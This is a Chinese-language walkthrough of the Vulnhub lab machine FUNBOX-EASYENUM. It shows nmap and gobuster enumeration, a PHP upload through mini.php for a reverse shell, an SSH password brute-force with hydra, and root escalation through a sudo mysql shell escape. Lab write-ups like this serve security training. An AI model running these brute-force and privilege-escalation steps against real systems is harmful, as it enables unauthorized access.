Vulnhub:FUNBOX-EASYENUM靶机

1.浏览器输入目标靶机IP地址浏览网页
Vulnhub:FUNBOX-EASYENUM靶机_第1张图片
2.端口扫描

nmap -p- 192.168.31.128
nmap -sC  -sV -p 22,80 192.168.31.128

Vulnhub:FUNBOX-EASYENUM靶机_第2张图片
3.目录枚举
目录枚举的时候找到了一个有意思的mini.php目录

gobuster dir -u http://192.168.31.128 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html.txt

Vulnhub:FUNBOX-EASYENUM靶机_第3张图片
4.在浏览器打开mini.php,经过测试可以上传.php文件
Vulnhub:FUNBOX-EASYENUM靶机_第4张图片
上传php文件,反弹shell
Vulnhub:FUNBOX-EASYENUM靶机_第5张图片
5.在/home目录下发现存在五个用户,使用暴力破解得出goat用户的SSH登录密码

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.31.128  ssh 

Vulnhub:FUNBOX-EASYENUM靶机_第6张图片

Vulnhub:FUNBOX-EASYENUM靶机_第7张图片
6.ssh登录系统之后,使用sudo -l命令发现可以使用mysql提权
使用提权语句 mysql -e '\! /bin/bash'成功获取root权限
Vulnhub:FUNBOX-EASYENUM靶机_第8张图片
最后,谢谢大家伙百忙之中观看我的文章。

你可能感兴趣的:(vulnhub,安全,靶机)